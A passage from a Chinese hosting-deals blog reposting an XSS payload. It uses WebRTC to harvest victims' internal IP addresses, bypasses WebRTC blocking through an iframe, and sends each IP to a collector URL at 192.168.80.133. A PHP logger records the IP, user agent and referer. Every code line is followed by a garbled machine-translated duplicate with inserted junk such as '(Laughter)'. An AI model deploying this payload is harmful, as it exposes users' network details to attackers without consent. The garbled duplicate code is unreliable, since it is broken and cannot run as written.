VPS参考测评推荐
专注分享VPS主机优惠信息
衡天云优惠活动
华纳云优惠活动
荫云优惠活动

xss-利用webrtc获取内网IP

主机参考:VPS测评参考推荐/专注分享VPS服务器优惠信息!若您是商家可以在本站进行投稿,查看详情!此外我们还提供软文收录、PayPal代付、广告赞助等服务,查看详情!
我们发布的部分优惠活动文章可能存在时效性,购买时建议在本站搜索商家名称可查看相关文章充分了解该商家!若非中文页面可使用Edge浏览器同步翻译!PayPal代付/收录合作

xss.js

xss.js

functiogetIPs(callback){

functiogetIPs(callback){

                var ip_dups = {};

var_dups={};

                //compatibility fofirefox and chrome

compatibility for firefox and chrome

                var RTCPeerConnection = window.RTCPeerConnection

RTCPeerConnection= window.RTCPeerConnection

                    || window.mozRTCPeerConnection

window.mozRTCPeerConnection

                    || window.webkitRTCPeerConnection;

Window.webkitRTCPeerConnection

                var useWebKit = !!window.webkitRTCPeerConnection;

WebKit=!! window.webkitRTCPeerConnection;

                //bypass naive webrtc blockinusing an iframe

naive bypass webrtc blocking using an iframe

                if(!RTCPeerConnection){

if(! RTCPeerConnection){

                    //NOTE: you need to have an iframe in the page right above the scriptag

Note: you need to have an iframe in the page right above the script tag

                    //

(Laughter)

                    //<iframe id="iframe" sandbox="allow-same-origingt;</iframegt;

iframe id="iframe""sandbox="allow-same-origin"gt;</iframegt;

                    //<scriptgt;...getIPs called in here...

getIPs called in here...

                    //

(Laughter)

                    var win = iframe.contentWindow;

var win= iframe.contentWindow;

                    RTCPeerConnection = win.RTCPeerConnection

RTCPeerConnection= win.RTCPeerConnection

                        || win.mozRTCPeerConnection

win.mozRTCPeerConnection

                        || win.webkitRTCPeerConnection;

win.webkitRTCPeerConnection;

                    useWebKit = !!win.webkitRTCPeerConnection;

WebKit=!! win.webkitRTCPeerConnection;

                }

(Laughter)

                //minimal requirements for data connection

Minimum requirements for data connection

                var mediaConstraints = {

mediaConstraints={

                    optional: [{RtpDataChannels: true}]

Optional: [{RtpDataChannels: true}]

                };

(Laughter)

                var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

[urls: stun:stun.services.mozilla.com]};

                //construct a new RTCPeerConnection

Construct a new RTCPeerConnection

                var pc = new RTCPeerConnection(servers, mediaConstraints);

var pc= new RTCPeerConnection (servers, mediaConstraints);

                function handleCandidate(candidate){

Candidate(candidate){

                    //match just the IP address

match just the IP address

                    var ip_regex = /([0-9]{1,3}(.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/

                 var ip_regex = /([0-9]{1,3}([0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/

                    var ip_addr = ip_regex.exec(candidate)[1];

var_addr= ip_regex.exec(candidate)[1];

                    //remove duplicates

remove duplicates

                    if(ip_dups[ip_addr] === undefined)

undefined)

                        callback(ip_addr);

ip_addr;

                    ip_dups[ip_addr] = true;

ip_dups[ip_addr]= true;

                }

(Laughter)

                //listen for candidate events

list for candidate events

                pc.onicecandidate = function(ice){

_Other Organiser

                    //skip non-candidate events

skip non-candidate events

                    if(ice.candidate)

ice candidate

                        handleCandidate(ice.candidate.candidate);

Candidate (ice.candidate.candidate) handler;

                };

(Laughter)

                //create a bogus data channel

create a false data channel

                pc.createDataChannel("");

pc.createDataChannel("");

                //create an offer sdp

create the sdp tool

                pc.createOffer(function(result){

createOffer(function(result){

                    //trigger the stun server request

trigger the stun server request

                    pc.setLocalDescription(result, function(){}, function(){});

pc.setLocalDescription(result, function({}, function({});

                }, function(){});

function({});

                //wait for a while to let everything done

wait for a while to let everything done

                setTimeout(function(){

setTimeout(function(){

                    //read candidate info from local description

read candidate info from local description

                    var lines = pc.localDescription.sdp.split('n');

was lines= pc.localDescription.sdp.split('n');

                    lines.forEach(function(line){

lines.forEach(function(line){

                        if(line.indexOf('a=candidate:') === 0)

(line.indexOf('a=candidate:')=== 0)

                            handleCandidate(line);

Candidate (line);

                    });

);

                }, 1000);

1000);

            }

(Laughter)

            //insert IP addresses into the page

insert IP addresses into the page

getIPs(function(ip){    var url="http://192.168.80.133:81/aaa.php?ip="+ip;

getIPs(function(ip){   var url="http://192.168.80.133:81/aaa.php? ip="+ip;

    var xmlhttp1=new XMLHttpRequest(); 

“var xmlhttp1=new XMLHttpRequest();”

    xmlhttp1.open("GET", url, true);

xmlhttp1.open("GET",url, true);

    xmlhttp1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

xmlhttps.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

    xmlhttp1.send(null);  });

xmlhttp1.send(null); );

server端:

server:

<?php

<? php

$ip=$_GET['ip'];

$ip=$_GET['ip'];

$time=date("j F, Y, g:i a");

$time=date("j F, Y, g:i a");

$agent = $_SERVER['HTTP_USER_AGENT'];

$agent=$_SERVER['HTTP_USER_AGENT'];

$referer=getenv('HTTP_REFERER');

$referer=getenv('HTTP_REFERER');

$text = 'ip:' =.$ip."rn".'Time:'.$time."rn".'User Agent:'.$agent."rn".'Referer:'.$referer."rn";

$text='ip:' =.$ip."rn".'Time:'.$time."rn".'User Agent:'.$agent."rn".'Referer:'.$referer."rn";

$file = fopen('vb.php' , 'a+');

$file = fopen('vb.php', 'a+');

fwrite($file,$text);

fwrite($file,$text);

fclose($file);

fclose($file);

?gt;

What? gt;

--------------------------------------------------------------
主机参考,收集国内VPSVPS测评主机测评云服务器虚拟主机独立服务器国内服务器高性价比建站主机相关优惠信息@zhujicankao.com
详细介绍和测评国外VPS主机,云服务器,国外服务器,国外主机的相关优惠信息,商家背景,网络带宽等等,也是目前国内最好的主机云服务器VPS参考测评资讯优惠信息分享平台

这几篇文章你可能也喜欢:

本文由主机参考刊发,转载请注明:xss-利用webrtc获取内网IP https://zhujicankao.com/14137.html

【腾讯云】领8888元采购礼包,抢爆款云服务器 每月 9元起,个人开发者加享折上折!
打赏
转载请注明原文链接:主机参考 » xss-利用webrtc获取内网IP
主机参考仅做资料收集,不对商家任何信息及交易做信用担保,购买前请注意风险,有交易纠纷请自行解决!请查阅:特别声明

相关推荐

评论 抢沙发

评论前必须登录!